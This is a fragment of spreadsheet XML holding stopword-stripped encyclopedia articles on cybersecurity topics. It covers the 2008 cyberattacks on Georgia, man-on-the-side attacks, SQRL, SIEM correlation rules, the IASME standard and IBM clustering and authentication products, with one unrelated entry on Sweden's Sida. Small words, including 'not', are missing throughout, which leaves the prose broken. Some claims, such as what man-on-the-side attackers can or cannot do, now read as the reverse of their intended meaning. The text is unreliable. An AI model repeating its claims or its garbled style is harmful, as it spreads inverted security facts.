russia".gadi evron, former chief israel's computer emergency response team, believed attacks georgian internet infrastructure resembled cyber-riot, rather cyber-warfare. evron admitted attacks could "indirect russian (military) action," pointed attackers "could attacked strategic targets eliminated (georgian internet) infrastructure kinetically." shadowserver registered different botnets involved attacks, controlled different command server.in march 2009, security researchers greylogic concluded russia's likely played role co-coordinating organizing attacks. stopgeorgia.ru forum front state-sponsored attacks.john bumgarner, member united states cyber consequences unit (us-ccu) research cyberattacks russo-georgian war. report concluded cyber-attacks georgia launched russian hackers 2008 demonstrated need international cooperation security. report stated organizers cyber-attacks aware russia's military plans, attackers believed civilians. bumgarner’s research concluded first-wave cyber-attacks launched georgian media sites line tactics used military operations. "most cyber-attack tools used campaign appear written customized degree specifically campaign georgia," research stated. also 2007 cyberattacks estonia cyxymu cyberwarfare russia references external links russian cyberwar georgia russo-georgian 2008: role cyber attacks conflict offensive information operations defining deterring cyber</t>
  </si>
  <si>
    <t>Man-on-the-side attack</t>
  </si>
  <si>
    <t>man-on-the-side attack form active attack computer security similar man-in-the-middle attack. instead completely controlling network node man-in-the-middle attack, attacker regular access communication channel, allows read traffic insert messages, modify delete messages sent participants. attacker relies timing advantage make sure response sends request victim arrives legitimate response. real-world attacks, response packet sent attacker used place malware victim's computer. need timing advantage makes attack difficult execute, requires privileged position network, example internet backbone. potentially, class attack performed within local network (assuming privileged position), research shown successful within critical infrastructure.the 2013 global surveillance revelations revealed national security agency (nsa) widely uses man-on-the-side attack infect targets malware quantum program.github suffered attack 2015. russian threat group might suffered similar attack 2019. definition man-on-the-side become familiarized term edward snowden leaked information nsa's quantum insert project. man-on-the-side attack involves cyber-attacker conversation people parties communicating online. cyber-attacker able intercept inject messages communication parties. however, cyber-attacker able remove signals communication channels. man-on-the-side attack applied websites retrieving online file downloads. cyber-attacker able receive signals perform attack satellite. long satellite dish place they're residing able read transmissions receive signals. satellites tend high latency, gives cyber attacker enough time send injected response victim actual response party reaches satellite link. therefore, reason attacker relies timing advantage. main difference man-in-the-middle attack man-on-the-side-attack man-in-the-middle attackers able intercept block messages signals transmitting, whilst man-on-the-side attackers able intercept inject messages signals party receives legitimate response. since man-on-the-side attack requires strong timing advantage, reason people man-on-the-side attack explained psychological behaviour. faculty member university stavanger, maria kjaerland, conducted exploration study examine relationship different cyber offences psychological behaviours. concluded compromise common activity hackers attacking targets challenge relies attackers accurate timing leaving messages victims. they easily caught timing incorrect able make therefore, challenge bears higher consequences amongst types attacks. therefore, similarly, man-on-the-side attack also require attackers rely time advantage order retrieving modifying information victims without realising determining hacker done. examples russia 2019, reported man-on-the-side attack might conceived russian threat group installing malwares. when victim used internet requested download file particular website, man-on-the-side attackers present aware victims attempting download file. since man-on-the-side attackers able prohibit victim downloading file, could intercept server send signal victim victim received legitimate response, requested download file. attacker intercepted sent victims message directed error site, victim think file removed simply cannot downloaded. however, even though victim would receive legitimate response website file download, since servers already contaminated, would able view legitimate website file sine received so-called proper response attacking team. error site, attacking team directed victims alternative website download files wanted attacking team controlled ran. when victim connected attacking team's server, known knowledge, would start downloading file victim's screen, shows site working finally download file. however, attacking team already found original file legitimate website modified file include pieces malwares sent file back victim. when victim clicked link started downloading file, already downloading file consisted malwares. china 2015, github repositories suffered flooded attack man-on-the-side attack. when user outside china attempts browse chinese website, required pass chinese internet infrastructure automatically directed website. infrastructure allowed request legitimate chinese website user wanted browse without modifications involved. response came back website, passed chinese internet infrastructure, could back user, response modified. modification involved malware changed baidu analytics script accessing baidu user-making request access github repositories continued browse website. user, able continue browsing chinese search engine, baidu, innocent since absolutely unaware fact response involved embedded malicious script, would make request access github side. this happened users outside china trying seek access chinese website, resulted extremely high volumes requests made github repositories. enormous load github bear caused server flood thus attacked. preventing attacks ways prevent mitigate attack micro level insurance coverage malware detected results losing data stored, financially affected. insurance coverage ensures financial losses covered. this beneficial companies losses consumers businesses impacted result millions billions dollars losses, even face bankruptcies. 2017, notpetya cyber attack caused companies suffer billion worldwide damage.2. familiarising malware products observational study conducted concluded although many people acknowledge need downloading malware defence products, many people familiar functions helps protects users exposed attacks. example, many users ignore software notification alert messages downloading potentially harmful files, makes susceptible attacks. therefore, users malware defence products effectively prevent unnecessary successful cyber-attacks. acknowledging different types cyber attacks software cybersecurity market, many different types malware defence products. essential gain holistic view risks associated cyber attacks users purchase effective malware defence software. three main pillars risks threat type, likelihood occurrence score, vulnerability. relationships three pillars risks follows. threat low, suggesting attacking results limited effect micro macro scale, attacker requires level skills; thus, vulnerability likelihood attack would high. hand, threat high, meaning attacking results limited effect micro macro scale, vulnerability likelihood attack would low. important acknowledge kind data information protect purchase malware software accordingly. since man-on-the-side attack relies accurate timing, considered high threat likelihood occurrence vulnerability. therefore, extent households need purchase malware defences prevent man-on-the-side attack would necessary. ways prevent mitigate attacks macro level promoting digital safety security knowledge, skills innovation government urge technological firms perform advanced research development produce safe digital technologies infrastructures. this could enhance safe secure digital practices levels society. example, austria, main strategies government aims adopt development security technology. include developing strengthening cyber-security programmes, providing training emergence cyber-security experts.2. enhancing crisis response technology advances, simultaneously greater varieties attacks occur. governments encouraged beyond understanding professional educational knowledge exercise contingency plan simulated cyber incidents gauge practical level preparedness. therefore, enhances government's resilience mitigating adapting risks posed cyber attacks. government must aware budget allocated anti virus software since different functionalities draw balance sophistication, risk vulnerability attack since impacts likelihood attack. references</t>
  </si>
  <si>
    <t>Swedish International Development Cooperation Agency</t>
  </si>
  <si>
    <t>swedish international development cooperation agency (swedish: styrelsen internationellt utvecklingssamarbete, sida) government agency swedish ministry foreign affairs. sida responsible organization bulk sweden's official development assistance developing countries. according oecd, 2020 official development assistance sweden increased 17.1% us$6.3 billion.sida also affirms respect human rights, democracy gender equality proclaimed universal declaration human rights missions, together "raoul wallenberg institute human rights humanitarian law" lund university, sida gave aide "equal state human rights women southeast asia" asia pacific forum held june 2011. sida also informed yogyakarta principles action working rights lgbti swedish government mandated "action plan sida's work sexual orientation gender identity international development cooperation 2007-2009". evaluation 2007–2009 action plan demonstrates significant work done many countries lgbti issues, including dialogue civil society, donors, governments; inclusion country strategies; programme initiatives. well directly funding number lgbti groups, sida headquarters actively promoted lgbti issues networking donors international stakeholders, giving radio interviews, writing newspaper article, participating arranging seminars pride festivals world outgames, including lgbti rights newly adopted policies. research cooperation long-term development cooperation supported sida research cooperation, aims strengthening research low-income countries, reduce poverty build sustainable societies. work, budget close 1000 million (2020), guided sweden's strategy research cooperation research development cooperation 2015–2021. also swedish workplace hiv/aids programme references</t>
  </si>
  <si>
    <t>SQRL</t>
  </si>
  <si>
    <t>sqrl (pronounced "squirrel") secure, quick, reliable login (formerly secure login) draft open standard secure website login authentication. software typically uses link scheme sqrl:// optionally code, user identifies pseudonymous zero-knowledge proof rather providing user password. this method thought impervious brute force password attack data breach. shifts burden security away party requesting authentication closer operating system implementation possible hardware, well user. sqrl proposed steve gibson gibson research corporation october 2013 simplify process authentication without risk revelation information transaction third party. history acronym sqrl coined steve gibson protocol drafted, discussed analyzed in-depth, community internet security enthusiasts news.grc.com newsgroups weekly podcast, security now!, october 2013. within days airing podcast, expressed interest working standard.google cloud platform developers maddox kyle moschetto mentioned sqrl document "modern password security system designers".a thesis sqrl analyzed found appears interesting approach, terms envisioned user experience well underlying cryptography. sqrl mostly combining well established cryptography novel way." benefits protocol answer problem identity fragmentation. improves protocols oauth openid requiring third party broker transaction, giving server secrets protect, username password. additionally, provides standard freely used simplify login processes available password manager applications. more importantly, standard open company benefit owning technology. according gibson's website, robust technology public domain security cryptography verified, deliberately restricted commercial reasons. phishing protections sqrl design-inherent intentional phishing defenses, mainly intended authentication, anti-phishing, despite anti-phishing properties. example case protocol used website, components necessary: implementation, part service implementation authenticates, displays code specially crafted according specifications protocol, browser plugin mobile application, read code order provide secure authentication. sqrl client uses one-way functions user's single master password decrypt secret master key, generates combination site domain name optionally additional sub-site identifier: e.g., example.com, example.edu/chessclub (sub-)site-specific public/private pair. signs transaction tokens private gives public site, verify encrypted data. there "shared secrets" compromise site could expose allow attacks accounts sites. thing successful attacker could get, public key, would limited verifying signatures used site. even though user unlocks master single password, never leaves sqrl client; individual sites receive information sqrl process could used site. sqrl implementations number proof-of-concept implementations made various platforms, including server (php, drupal, .net) client (android, .net, java, python). there also various server-end test debugging sites available. legal aspects steve gibson states sqrl "open free, be", solution "unencumbered patents". after sqrl brought attention qr-code-based authentication mechanisms, suggested protocol said blogger michael beiter patented earlier thus generally available royalty-free use. patent question (not expiring 2030) applied granted spanish company soluciones globales internet division madrid-based technology aerospace corporation innovating solutions), 2008 2012 patent offices united states, european union, spain, portugal. gibson responded: "what guys described patent completely different sqrl operates, would conflict sqrl patent. superficially, anything uses code authentication seems 'similar' superficially solutions are. details matter, sqrl operates entirely different details." also references external links sqrl homepage grc.com brinkmann, martin (october 2013). "how sqrl improve website login authentication process". ghacks.net. retrieved march 2021. lambert, patrick (2013). "sqrl: method authentication codes". tech republic. retrieved march 2021. holmlund, daniel (january 2014). "authentication without passwords implementing sqrl". 2014 html5 developer developer conference. silicon valley international game developers association. retrieved march 2021 youtube.</t>
  </si>
  <si>
    <t>Security information and event management</t>
  </si>
  <si>
    <t>security information event management (siem) field within field computer security, software products services combine security information management (sim) security event management (sem). they provide real-time analysis security alerts generated applications network hardware. vendors sell siem software, appliances, managed services; products also used security data generate reports compliance purposes. term initialism siem coined mark nicolett amrit williams gartner 2005. history monitoring system logs grown prevalent complex cyber-attacks force compliance regulatory mechanisms mandate logging security controls within risk management framework. logging levels system started primary function troubleshooting system errors debugging code compiled run. operating systems networks increased complexity, event generation systems. comparison, logging system, security, application logs perform incident response. they offer capability trace activities nearly system user-related movement throughout given period. from late 1970s, formation working groups help establish criteria management auditing monitoring programs system logs used insider threat, incident response, troubleshooting. this also established base discussion many concepts still used modern cybersecurity. see, basis audit evaluation computer security national institute standards technology (nist) special publication 500-19 published 1977.with risk management frameworks (rmf) implemented worldwide nearly industry sectors, auditing monitoring core elements information assurance information security. information assurance personnel, cybersecurity engineers, analysts logging information perform critical security functions real-time. these items driven governance models integrate auditing monitoring basis analytical work. information assurance matured late 1990s moved 2000s, system logs needed centralized. this allows records centrally located viewed provides centralized management 'nerve center' machines given network. this centralization consolidation system data would provide significantly holistic view. still, organizations could logging data operational cases help performance networking-based communication troubleshooting. security information event management (siem) commonplace, apparent variations acronym article. word siem primarily moniker forcing logs single place provide single pane glass security network operations perform analysis. national institute standards technology provides following definition security information event management (siem): "application provides ability gather security data information system components present data actionable information single interface." information assurance become forcing function system logging. system logging enable traceability account system used perform system actions. combination operating system, siem index parse system logs made available searching. 2021, united states president joseph biden signed executive order 14028 improving nations cybersecurity. this executive order mandates endpoint protection, defining logging requirements, implementing audit logging unified way, enhancing capabilities provide insight system account actions. audit logs identified three separate technical areas, relating incident response knowing happening system given time. this executive order responds increase cyber-attacks ransomware cripple critical infrastructure components related national security public. enhancing existing information assurance security controls part risk management framework suitable mechanism force compliance justify funding based presidential requirements. security information event management (siem) information assurance published september 2006, nist 800-92 guide computer security management primary document used nist risk management framework auditable. while definitive exhaustive significant changes technology since 2006, guidance anticipated industry growth document still relevant. this document pre-dates many modern siem technologies well known today, evident reference term "siem. nist guidance regulatory mechanism auditing monitoring encouraged siem solutions instead de-centralized individual host-based checks. nist identifies several public private entities logging guidance enforce requirements; federal information security management 2002 (fisma), gramm-leach-bliley (glba), health insurance portability accountability 1996 (hipaa), sarbanes-oxley (sox) 2002, payment card industry data security standard (pci dss), international organization standardization (iso) 27001. uncommon nist documents referenced public private organizations. nist 800-53 au-2 event monitoring core security control enabling logging functionality support information assurance process auditing throughout system. au-2 event monitoring also serves critical basis continuous monitoring information assurance cybersecurity engineering efforts throughout network. expected siem solution used core tool suite tools support effort. depending system categorization concerning impact confidentiality, integrity, availability (cia) system generally five specific requirements needed satisfy base logging requirements federal system (au-2, a-e). essential understand security control requirements siem infrastructure operation. below security control requirements au-2.the [assignment: organization-defined...] left blank determine appropriate enterprise. executive order 14028 seeks unify inputs across federal agencies.a. identify types events system capable logging support audit function: [assignment: organization-defined event types system capable logging]; coordinate event logging function organizational entities requiring audit-related information guide inform selection criteria events logged; specify following event types logging within system: [assignment: organization-defined event types (subset event types defined au-2a.) along frequency situation requiring) logging identified event type]; provide rationale event types selected logging deemed adequate support after-the-fact investigations incidents; review update event types selected logging [assignment: organization-defined frequency].events system could include limited credential changes, failed access attempts, role base attribute changes accounts, token-based use, access attempts, failures, etc. while logging every system action system possible, often advised based volume logs actionable security-relevant data. organizations au-2 basis build adhering controls require call specific security auditing requirements granular detail. nist 800-53 si-4 system monitoring security control specifies monitoring system. this monitoring focused monitoring systems monitor system. this include hardware software unison detect events anomalies, malware, connections, pertinent mechanism used detect attacks indicators potential attacks.a. monitor system detect: attacks indicators potential attacks accordance following monitoring objectives: [assignment: organization-defined monitoring objectives]; unauthorized local, network, remote connections;b. identify unauthorized system following techniques methods: [assignment: organization-defined techniques methods]; invoke internal monitoring capabilities deploy monitoring devices: strategically within system collect organization-determined essential information; locations within system track specific types transactions interest organization;d. analyze detected events anomalies; adjust level system monitoring activity change risk organizational operations assets, individuals, organizations, nation; obtain legal opinion regarding system monitoring activities; provide [assignment: organization-defined system monitoring information] [assignment: organization-defined personnel roles] [selection (one more): needed; [assignment: organization-defined frequency]].nist 800-53 ra-10 threat hunting base security control added nist 800-53 latest revision edit publication. threat hunting proactive defense network combining security information actively looking threats. execute operation, analysts engineers need repository information, siem solution often used system logs would typically sent centralized location. threat hunting team limited approach. however, siem solution provide significant amounts security-relevant data.a. establish maintain cyber threat hunting capability search indicators compromise organizational systems; detect, track, disrupt threats evade existing controls; employ threat hunting capability [assignment: organization-defined frequency].nist 800-53 brief descriptions au-2, si-4, ra-10 depict individual controls used critical elements event, alerting monitoring siem. these controls, combined technical security controls provided nist, weave together in-depth defense system. assurance system security enforced various risk assessments continuous monitoring often enhanced streamlined siem product used across entire cybersecurity teams. there many technical controls outline specific items must monitored. controls identified cursory overlook controls directly related event audit gathering functionality siem tool. terminology acronyms sem, siem sometimes used interchangeably, generally refer different primary focus products: management: focus simple collection storage messages audit trails security information management (sim): long-term storage well analysis reporting data. security event manager (sem): real-time monitoring, correlation events, notifications console views. security information event management (siem): combines provides real-time analysis security alerts generated network hardware applications. managed security service: (mss) managed security service provider: (mssp): common managed services appear evolve around connectivity bandwidth, network monitoring, security, virtualization, disaster recovery. security service (secaas): these security services often include authentication, anti-virus, anti-malware/spyware, intrusion detection, penetration testing security event management, among others.in practice many products area functions, often overlap many commercial vendors also promote terminology. oftentimes commercial vendors provide different combinations functionalities tend improve siem overall. management alone provide real-time insights network security, provide complete data deep threat analysis. when management combined, information available siem monitor. focus monitor help manage user service privileges, directory services system-configuration changes; well providing auditing review incident response. capabilities data aggregation: management aggregates data many sources, including networks, security, servers, databases, applications, providing ability consolidate monitored data help avoid missing crucial events. correlation: looks common attributes links events together meaningful bundles. this technology provides ability perform variety correlation techniques integrate different sources, order turn data useful information. correlation typically function security event management portion full siem solution alerting: automated analysis correlated events dashboards: tools take event data turn informational charts assist seeing patterns, identifying activity forming standard pattern. compliance: applications employed automate gathering compliance data, producing reports adapt existing security, governance auditing processes. retention: employing long-term storage historical data facilitate correlation data time, provide retention necessary compliance requirements. long term data retention critical forensic investigations unlikely discovery network breach time breach occurring. forensic analysis: ability search across logs different nodes time periods based specific criteria. this mitigates aggregate information head search thousands thousands logs. components siem architectures vary vendor; however, generally, essential components comprise siem engine. essential components siem follows: data collector forwards selected audit logs host (agent based host based streaming index aggregation point) ingest indexing point aggregation point parsing, correlation, data normalization search node used visualization, queries, reports, alerts (analysis take place search node) basic siem infrastructure depicted image right. cases computer security researcher chris kubecka identified following siem cases, presented hacking conference 28c3 (chaos communication congress). siem visibility anomaly detection could help detect zero-days polymorphic code. primarily rates anti-virus detection type rapidly changing malware. parsing, normalization categorization occur automatically, regardless type computer network device, long send log. visualization siem using security events failures pattern detection. protocol anomalies indicate misconfiguration security issue identified siem using pattern detection, alerting, baseline dashboards. siems detect covert, malicious communications encrypted channels. cyberwarfare detected siems accuracy, discovering attackers victims. correlation rules examples siem systems hundreds thousands correlation rules. some simple, complex. once correlation rule triggered system take appropriate steps mitigate cyber attack. usually, includes sending notification user possibly limiting even shutting system. according utmstack, important ones. brute force detection brute force detection relatively straightforward. brute forcing relates continually trying guess variable. commonly refers someone trying constantly guess password either manually tool. however, refer trying guess urls important file locations system. automated brute force easy detect someone trying enter password times minute impossible. impossible travel when user logs system, generally speaking, creates timestamp event. alongside time, system often record useful information device used, physical location, address, incorrect login attempts, etc. data collected gathered impossible travel, system looks current last login date/time difference recorded distances. deems possible happen, example traveling hundreds miles within minute, warning. many employees users using services obscure physical location. this taken consideration setting rule. excessive file copying think day-to-day activities, likely copy move files around system. therefore excessive file copying system could attributed someone wanting cause harm company. unfortunately, simple stating someone gained access network illegally wants steal confidential information. could also employee looking sell company information, could want take home files weekend. ddos attack ddos (distributed denial service) attack would cause issue pretty much company. ddos attack take properties offline, also make system weaker. with suitable correlation rules place, siem trigger alert right start attack take necessary precautionary measures protect systems. file integrity change file integrity change monitoring (fim) process monitoring files system. unexpected changes system files trigger alert likely indication cyber attack. models alongside correlation rules, also possible siem models. models differ somewhat correlation rules implemented correctly useful. instead using one-to-one correlation, model requires number steps happen order trigger alert. this usually means first-time rule followed anomalous behavior. this simple user logging different location usual carrying large file transfer. this extremely useful single event necessarily mean compromise organization's servers network, could team member working café change scenery. handling false positives unfortunately, false positives appear walks life, holds true siem. tools systems possibility produce false-positive result. example, many failed login attempts employee forgetting password someone trying break system. it's important triggered events steps taken justifiable appropriate measure want employees getting locked hours scenarios. alerting examples some examples customized rules alert event conditions involve user authentication rules, attacks detected infections detected. also risk management security event manager security information management references</t>
  </si>
  <si>
    <t>IASME</t>
  </si>
  <si>
    <t>iasme governance information assurance standard designed simple affordable help improve cyber security small medium-sized enterprises (smes). iasme governance technical controls aligned cyber essentials scheme certification iasme standard includes certification cyber essentials. iasme governance standard developed 2010 proven effective improving security supply chains large organisations. standard maps closely international iso/iec 27001 information assurance standard. background iasme governance originally developed academic-sme partnership attracted interest government small businessesresearch towards iasme model undertaken 2009-10, acknowledgement current international information assurance standard (iso/iec 27001) complex resource-strapped smes, providing weakness supply chain. iasme developed 2010-11 launched later year. revised regularly keep pace changes risk environment smes. development process smes explained published international conference paper.the iasme governance standard follows implementation pattern used international standards community including pdca (plan-do-check-act) principles information security management system (isms) provides management framework. both refined expressed business terms recognisable organisations sizes. iasme governance standard developed piloted help small businesses mostly west midlands encouraging results. standard shown useful smes internationally.large organisations iasme governance standard supply chains understand reduce supplier risk. article explaining supply chain benefits written developer, david booth. both large small organisations iasme certification alternative iso/iec 27001 standard. structure standard standard managed iasme consortium operate network certification bodies licensed certify candidate organisations. question free anyone download without registration licensed creative commons by-nc-nd license.the standard available levels assurance: iasme governance self-assessment candidates complete online questionnaire around simple questions organisation. this marked certification body awards certification answers given compliant standard. assessment includes certification cyber essentials standard. iasme governance audited "iasme gold") candidate organisation visited iasme certification body verifies compliance standard and, appropriate, issues certification.in 2017, standard updated include additional questions enable organisations comply general data protection regulations (gdpr). topics covered standard iasme governance standard covers following information security topics: managing security information assets cloud services risk management data protection (including gdpr) people security policy physical environmental firewalls internet gateways secure configuration patches updates operations management user accounts administrative access malware protection vulnerability scanning monitoring backup restore incident management business continuity comparison standards iso/iec 27001/2 iasme governance risk-led standard similar controls annex iso/iec 27001 standard. ncsc steps cyber security iasme governance maps closely government's ncsc steps cyber security. mapping standards available cyber assessment framework cyber assessment framework (caf) developed government allow organisations demonstrate compliance directive. iasme governance standard maps closely caf. digital data security protection toolkit digital data security protection toolkit online self-assessment tool allows organisations measure performance national data guardian’s data security standards. iasme governance maps closely toolkit majority topics usage standard awards iasme standard become focus attention, information security threat businesses continues increase, vulnerabilities systems continue cause expensive data breaches system failures. increasing number newspaper journal articles subject reflect increased security awareness.it recognised states jersey suitable security standard government supply chain.iasme specifically mentioned keynote speech infosec europe 2013 event held london received innovation award computer weekly europe shortly afterwards. april 2019, iasme awarded cyber business year prestigious national cyber awards also cyber essentials iso/iec 27001 gdpr directive references external links iasme governance self-assessed question (free download) free download cyber essentials self assessment questions iasme governance standard free download iasme standard research need iasme research iasme development iasme: information security management evolution smes webinar: "are ever vulnerability customers" home innovateuk</t>
  </si>
  <si>
    <t>Security information management</t>
  </si>
  <si>
    <t>security information management (sim) information security industry term collection data files central repository trend analysis. overview products generally software agents running computer systems monitored. recorded information sent centralized server acts "security console". console typically displays reports, charts, graphs information, often real time. some software agents incorporate local filters reduce manipulate data send server, although typically forensic point view would collect audit accounting logs ensure recreate security incident.the security console monitored administrator reviews consolidated information takes action response alerts issued.the data sent server correlated analyzed normalized software agents common form, usually xml. those data aggregated order reduce overall size. terminology terminology easily mistaken reference whole aspect protecting one's infrastructure computer security breach. historic reasons terminology evolution; refers part information security consists discovery 'bad behavior' policy violations using data collection techniques. term commonly used represent entire security infrastructure protects environment commonly called information security management (infosec). security information management also referred management different (security event management), makes portion siem (security information event management) solution. also information security information security management information security management system security information event management security event manager references</t>
  </si>
  <si>
    <t>Security level management</t>
  </si>
  <si>
    <t>security level management (slm) comprises quality assurance system electronic information security. display security status transparently across company time, make security measurable quantity. transparency measurability form prerequisites making security proactively monitorable, improved continuously. oriented towards phases deming cycle/plan-do-check-act (pdca) cycle: within scope slm, abstract security policies compliance guidelines company transposed operative, measureable specifications security infrastructure. operative aims form security level reached. security level checked permanently current performance security systems (malware scanner, patch systems, etc.). deviations recognised early adjustments made security system. falls range duties chief security officer (cso), chief information officer (cio) chief information security officer (ciso), report directly executive board security data availability. classification related disciplines security security event management (siem), analysts gartner summarise magic quadrant security information event management, define follows: "[…] provides reporting analysis data primarily host systems applications, secondarily security devices support security policy compliance management, internal threat management regulatory compliance initiatives. supports monitoring incident management activities security organization […]. improves security incident response capabilities. processes near-real-time data security devices, network devices systems provide real-time event management security operations. […]" relate infrastructure realising superordinate security aims, descriptive strategic management system aims, measures, revisions actions derived this. unites requisite steps realising measurable, functioning security structure management control cycle. categorised strategic panoply governance, which, suitable organisation structures processes, ensures supports corporate strategy objectives. allows csos, cios cisos prove contributing towards protecting electronic data relevant processes adequately, therefore makes contribution part governance. steps towards defining security level (plan): each company specifies security policies. executive management defines aims relation integrity, confidentiality, availability authority classified data. order able verify compliance specifications, concrete aims individual security systems company need derived abstract security policies. security level consists collection measurable limiting threshold values. example: operative aims like "the anti-virus systems sites need up-to-date longer four hours publication current definition" need derived superordinate security policies like "our employees able work without interrupted." limiting threshold values specified separately individually different sites, locations countries, infrastructure on-site local determining factors need taken consideration. example: office buildings normally equipped high-speed dedicated lines. wholly realistic limit deadline supplying computers newest anti-virus definitions hours. factory asia, slow modem link web, realistic limiting value would somewhat higher. control manual control objectives information related technology cobit (cobit) provides companies instructions transposing subordinate, abstract aims measurable aims steps. collecting analysing data (do):information current status systems gleaned file status reports provided individual anti-virus, anti-spyware anti-spam consoles. monitoring reporting solutions analysing software applications software houses simplify accelerate data collection. checking security level (check): prescribes continual reconciliation defined security level current measured values. automated real-time reconciliation supplies companies permanent status report security status across locations. adjusting security structure (act): efficient allows trend analyses long-term comparative assessments made. through rolling observation security level, weak spots network identified early appropriate adjustments made proactively security systems. also besides defining specifications engineering, introducing, operating, monitoring, maintaining improving documented information security management system, iso/iec 27001 also defines specifications implementing suitable security mechanisms. itil, collection best practices control processes, goes beyond security. relation, supplies criteria security officers conceive security independent, qualitatively measurable service integrate universe business-process-oriented processes. itil also works policies, processes, procedures job-related instructions, assumes superordinate, also operative aims need planned, implemented, controlled, evaluated adjusted. external links cobit: summary material german chapter isaca german deutsch.pdf cobit german iso/iec 27000 27000 directory international organization standardization itil "itil information security" (itil informationssicherheit), federal office information security (bsi), germany german "how itil improve information security", securityfocus.com english official itil website british office government commerce english</t>
  </si>
  <si>
    <t>Security log</t>
  </si>
  <si>
    <t>security used track security-related information computer system. examples include: windows security internet connection firewall security logaccording stefan axelsson, "most unix installations form security logging software, mainly security logging facilities expensive terms disk storage, processing time, cost associated analyzing audit trail, either manually special software." also audit trail server management intelligence analysis software counter data logging common format syslog references</t>
  </si>
  <si>
    <t>IBM High Availability Cluster Multiprocessing</t>
  </si>
  <si>
    <t>powerha systemmirror (formerly powerha hacmp) ibm's solution high-availability clusters unix linux system platforms stands high availability cluster multiprocessing. ibm's hacmp product first shipped 1991 20th release powerha systemmirror 7.1. powerha computers nodes, either actively running application (active) waiting take another node fails (passive). data file systems shared systems cluster. powerha relies heavily ibm's reliable scalable cluster technology (rsct). powerha rsct aware client. rsct distributed aix. rsct includes daemon called group services coordinates response events interest cluster (for example, interface node fails, administrator makes change cluster configuration). powerha v6.1, rsct also monitored cluster nodes, networks network adapters failures using topology services daemon (topsvcs). current release (v7.1), rsct provides coordinate response nodes, monitoring communication provided cluster aware (caa) infrastructure. release powerha relies heavily caa, clustering infrastructure built operating system exploited rsct powerha. provides monitoring communication infrastructure powerha clustering solutions aix, well cluster-wide event notification using autonomic health advisor file system (ahafs) cluster-aware commands clcmd. replaces function provided topology services (topsvcs) rsct previous releases powerha/hacmp [1]. powerha systemmirror timeline powerha systemmirror releases powerha systemmirror powerha systemmirror 7.2, released october 2015 (2015-10-01).[2] powerha systemmirror 7.2.1, released october 2016 (2016-10-11).new user interface. powerha systemmirror released 2010 (2010), uses cluster aware (caa) infrastructure available v6.1 powerha systemmirror 7.1.1 february 2012 (2012-02-17). powerha powerha 6.1, rebranded powerha systemmirror aix, 2009, standard enterprise editions srdf support glvm 2-site configuration wizard improvements smit panels file collections ipv6 support hacmp hacmp 5.5, rebranded powerha, 2008, asynchronous replication support updated support dlpar/cuod include support power5 power6 processors support lpar mobility relocate critical applications powerha/xd pprc support global mirror used volume controller function allow powerha/xd pprc support multiple storage subsystems site better integration operating system avoiding modifications tcp/ip bringing process hacmp 5.4.1, 2007, announcement workload partitions support (wpar) glvm monitoring nfsv4 support improvements hacmp 5.4, july 2006, announcement web-based nondisruptive hacmp cluster startup, upgrades, maintenance hacmp 5.3, august 2005 hacmp 5.2, july 2004 hacmp 5.1, july 2003 hacmp hacmp 4.5, july 2002 hacmp 4.4, june 2000 hacmp hacmp adds cluster single point control (cspoc) feature dynamic reconfig also high-availability cluster live partition mobility references external links hacmp homepage (pdf) hacmp best practices whitepaper, july 2007 update hacmp/powerha hints tips hacmp documentation hacmp certified systems expert requirements hacmp version compatibility matrix powerha technical forum health check</t>
  </si>
  <si>
    <t>IBM Lightweight Third-Party Authentication</t>
  </si>
  <si>
    <t>lightweight third-party authentication (ltpa), authentication technology used websphere lotus domino products. when accessing servers ltpa technology possible user re-use login across physical servers. lotus domino server websphere server configured ltpa authentication challenge user name password. when user authenticated, browser received session cookie cookie available browsing session. this cookie contains ltpa token. user received ltpa token accesses server member authentication realm first server, browsing session terminated (the browser closed down), user automatically authenticated challenged name password. such environment also called single-sign-on (sso) environment. also access control single sign-on list single sign-on implementations references developertoolbox technical magazine: websphere domino single sign-on dominotomcatsso openntf.org: open source implementation ltpa tomcat websphere websphere liberty profile</t>
  </si>
  <si>
    <t>Security hacker</t>
  </si>
  <si>
    <t>security hacker someone explores methods breaching defenses exploiting weaknesses computer system network. hackers motivated multitude reasons, profit, protest, information gathering, challenge, recreation, evaluation system weaknesses assist formulating defenses potential hackers. subculture evolved around hackers often referred "computer underground".longstanding controversy surrounds meaning term "hacker". controversy, computer programmers reclaim term hacker, arguing refers simply someone advanced understanding computers computer networks cracker appropriate term break computers, whether computer criminals (black hats) computer security experts (white hats). 2014 article noted "the black-hat meaning still prevails among general public". history birth subculture entering mainstream: 1960's-1980's subculture around hackers termed network hacker subculture, hacker scene, computer underground. initially developed context phreaking 1960s microcomputer scene 1980s. implicated 2600: hacker quarterly alt.2600 newsgroup. 1980, article august issue psychology today (with commentary philip zimbardo) used term "hacker" title: "the hacker papers". excerpt stanford bulletin board discussion addictive nature computer use. 1982 film tron, kevin flynn (jeff bridges) describes intentions break encom's computer system, saying "i've little hacking here". software uses this. 1983, hacking sense breaking computer security already computer jargon, public awareness activities. however, release film wargames year, featuring computer intrusion norad, raised public belief computer security hackers (especially teenagers) could threat national security. this concern became real when, year, gang teenage hackers milwaukee, wisconsin, known 414s, broke computer systems throughout united states canada, including alamos national laboratory, sloan-kettering cancer center security pacific bank. case quickly grew media attention, 17-year-old neal patrick emerged spokesman gang, including cover story newsweek entitled "beware: hackers play", patrick's photograph cover. newsweek article appears first word hacker mainstream media pejorative sense. pressured media coverage, congressman glickman called investigation began work laws computer hacking. neal patrick testified u.s. house representatives september 1983, dangers computer hacking, bills concerning computer crime introduced house year. result laws computer criminality, white hat, grey black hackers distinguish other, depending legality activities. these moral conflicts expressed mentor's "the hacker manifesto", published 1986 phrack. term hacker meaning computer criminal also advanced title "stalking wily hacker", article clifford stoll 1988 issue communications acm. later year, release robert tappan morris, so-called morris worm provoked popular media spread usage. popularity stoll's book cuckoo's egg, published year later, entrenched term public's consciousness. classifications computer security, hacker someone focuses security mechanisms computer network systems. hackers include someone endeavors strengthen security mechanisms exploring weaknesses also seek access secure, unauthorized information despite security measures. nevertheless, parts subculture correcting security problems word positive sense. white name given ethical computer hackers, utilize hacking helpful way. white hats becoming necessary part information security field. they operate code, acknowledges breaking people's computers bad, discovering exploiting security mechanisms breaking computers still interesting activity done ethically legally. accordingly, term bears strong connotations favorable pejorative, depending context. subgroups computer underground different attitudes motives different terms demarcate other. these classifications also used exclude specific groups agree. cracker eric raymond, author hacker's dictionary, advocates members computer underground called crackers. yet, people hackers even include views raymond wider hacker culture, view raymond harshly rejected. instead hacker/cracker dichotomy, emphasize spectrum different categories, white hat, grey hat, black script kiddie. contrast raymond, usually reserve term cracker malicious activity. according 